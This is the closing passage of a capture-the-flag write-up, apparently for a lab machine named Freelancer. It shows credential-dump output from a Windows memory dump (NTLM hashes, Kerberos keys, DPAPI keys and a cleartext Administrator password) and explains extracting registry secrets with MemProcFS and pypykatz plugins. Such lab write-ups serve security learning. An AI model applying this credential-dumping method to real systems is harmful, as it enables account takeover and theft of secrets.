kerberos        freelancer.htb  DATACENTER-2019$                                                        a680a4af30e045066419c6f52c073d738241fa9d1cff591b951535cff5320b109e65220c1c9e4fa891c9d1ee22e990c4766b3eb63fb3e2da67ebd19830d45c0ba4e6e6df93180c0a7449750655edd78eb848f757689a6889f3f8f7f6cf53e1196a528a7cd105a2eccefb2a17ae5aebf84902e3266bbc5db6e371627bb0828c2a364cb01119cf3d2c70d920328c814cad07f2b516143d86d0e88ef1504067815ed70e9ccb861f57394d94ba9f77198e9d76ecadf8cdb1afda48b81f81d84ac62530389cb64d412b784f0f733551a62ec0862ac2fb261b43d79990d4e2bfbf4d7d4eeb90ccd7dc9b482028c2143c5a6010
msv     FREELANCER      DATACENTER-2019$        1003ddfa0a470017188b719e1eaae709                4ce0bf0f488248a0858d1eacbe75529994ba4999
msv     Font Driver Host        UMFD-1  1003ddfa0a470017188b719e1eaae709                4ce0bf0f488248a0858d1eacbe75529994ba4999
kerberos        freelancer.htb  DATACENTER-2019$                                                        a680a4af30e045066419c6f52c073d738241fa9d1cff591b951535cff5320b109e65220c1c9e4fa891c9d1ee22e990c4766b3eb63fb3e2da67ebd19830d45c0ba4e6e6df93180c0a7449750655edd78eb848f757689a6889f3f8f7f6cf53e1196a528a7cd105a2eccefb2a17ae5aebf84902e3266bbc5db6e371627bb0828c2a364cb01119cf3d2c70d920328c814cad07f2b516143d86d0e88ef1504067815ed70e9ccb861f57394d94ba9f77198e9d76ecadf8cdb1afda48b81f81d84ac62530389cb64d412b784f0f733551a62ec0862ac2fb261b43d79990d4e2bfbf4d7d4eeb90ccd7dc9b482028c2143c5a6010
msv     Font Driver Host        UMFD-0  1003ddfa0a470017188b719e1eaae709                4ce0bf0f488248a0858d1eacbe75529994ba4999
kerberos        freelancer.htb  DATACENTER-2019$                                                        a680a4af30e045066419c6f52c073d738241fa9d1cff591b951535cff5320b109e65220c1c9e4fa891c9d1ee22e990c4766b3eb63fb3e2da67ebd19830d45c0ba4e6e6df93180c0a7449750655edd78eb848f757689a6889f3f8f7f6cf53e1196a528a7cd105a2eccefb2a17ae5aebf84902e3266bbc5db6e371627bb0828c2a364cb01119cf3d2c70d920328c814cad07f2b516143d86d0e88ef1504067815ed70e9ccb861f57394d94ba9f77198e9d76ecadf8cdb1afda48b81f81d84ac62530389cb64d412b784f0f733551a62ec0862ac2fb261b43d79990d4e2bfbf4d7d4eeb90ccd7dc9b482028c2143c5a6010
msv     FREELANCER      Administrator   acb3617b6b9da5dc7778092bdea6f3b8                ccbee099f360c2fd26b8a3953d9b37893bcaa467
kerberos        FREELANCER.HTB  Administrator                                                   v3ryS0l!dP@sswd#29
msv     FREELANCER      liza.kazanof    6bc05d2a5ebf34f5b563ff233199dc5a                93eff904639f3b40b0f05f9052c48473ecd2757e
dpapi                                           e88b706951f959a337fdf1a4d2eb5c61505435464ebdf135eb33105155da02279ca34659ac5892fe35302fa8695a35e0db93fdfa08f08b18d4e30f2db01e2e38        04c39947e3b7bc21c381e0cf757cf62c1927b1b2        b3859cd0-59d2-4857-8a5f-98d469e5d8d2
msv     Window Manager  DWM-1   1003ddfa0a470017188b719e1eaae709                4ce0bf0f488248a0858d1eacbe75529994ba4999
kerberos        freelancer.htb  DATACENTER-2019$                                                        a680a4af30e045066419c6f52c073d738241fa9d1cff591b951535cff5320b109e65220c1c9e4fa891c9d1ee22e990c4766b3eb63fb3e2da67ebd19830d45c0ba4e6e6df93180c0a7449750655edd78eb848f757689a6889f3f8f7f6cf53e1196a528a7cd105a2eccefb2a17ae5aebf84902e3266bbc5db6e371627bb0828c2a364cb01119cf3d2c70d920328c814cad07f2b516143d86d0e88ef1504067815ed70e9ccb861f57394d94ba9f77198e9d76ecadf8cdb1afda48b81f81d84ac62530389cb64d412b784f0f733551a62ec0862ac2fb261b43d79990d4e2bfbf4d7d4eeb90ccd7dc9b482028c2143c5a6010
msv                     1003ddfa0a470017188b719e1eaae709                4ce0bf0f488248a0858d1eacbe75529994ba4999
dpapi                                           182ec41e8b2b2b36200887fe41dfc5f71b73c2b619ec79c0510056b4bf777e151f31d18a435b5d91aeaf7db6be46c278ed315b68dd6c318b5745f9c5bf9473e3        acdef27600c7f4abc37bb3eb70b53e4db9c4fd34        bb43c14f-ceb3-4470-849a-af15c76aac4a
dpapi                                           d8201d9b1dd265a4c7f8a69a808d8755c9912c386feb6bf379e08d41cdb6d26b749dda3e31c0a538139c564263769cd4deb6c274b0b9d16d2a301a4d72d7d50c        4970c224ef4b328f76ff6deb742511cec404cbe8        981d16b3-c818-4a7e-82fe-1206e42b6c72
dpapi                                           95e2ae7fd5c84c8e5bb19665661286fc54c6dec7ebe820ce1a74e359374f4f75f6c3275333be7ad14931a238ce64708f6160af90ba0ae2f82b4d653a6a96132e        5d73afc8ef9e38f6cf5a5cc3a6f4208ea21852a9        57db84cf-ea9c-45a1-a6e8-d618821e181e
dpapi                                           ca76b946db6b85cbe497c531122ca25d333e0e5aa7d5a6251c420d9816f2583fafac661734d33edd00e1ffb1bd273403583e82a085a78d75f29bac7bb6fc4401        38da8205a8861bda9d616adb6af7189963cb5fb1        1d1cfc42-9fc7-49bb-b834-9e0600d6e152

MemProcFS

Instead of volatility and mimikatz, MemProcFS and its plugins can be used to examine the memory dump in a filesystem-like setting.

I download the tool from the releases page on GitHub and extract the contents, then I repeat the steps for the plugins and place the folders from files/plugins into the plugins folder of MemProcFS. Python is already installed on my machine and I just need to get the dependencies for the plugins through pip install dissect.cstruct pypykatz aiowinreg.

After running memprocfs.exe -device "MEMORY.DMP" the contents of the memory dump are mounted on M: and I can browse the files. Within registry/hive_files I can access the different hives and could use secretsdump to dump the credentials, but I don’t really have to because the previously installed plugins did that job for me. The extracted credentials are already present in M:\py\regsecrets.

Screenshot of a Windows VM with a running memprocfs in the background, several files with credentials in the explorer and a text editor with credentials highlighted

Footnotes

  1. Impersonation of other users

  2. Memdumps, Volatility, Mimikatz, VMs – Part 3: WinDBG Mimikatz Extension

  3. Account Operators

  4. The AD Recycle Bin: Understanding, Implementing, Best Practices, and Troubleshooting

  5. Restore-ADObject

  6. Server Operators

  7. CreateFileA function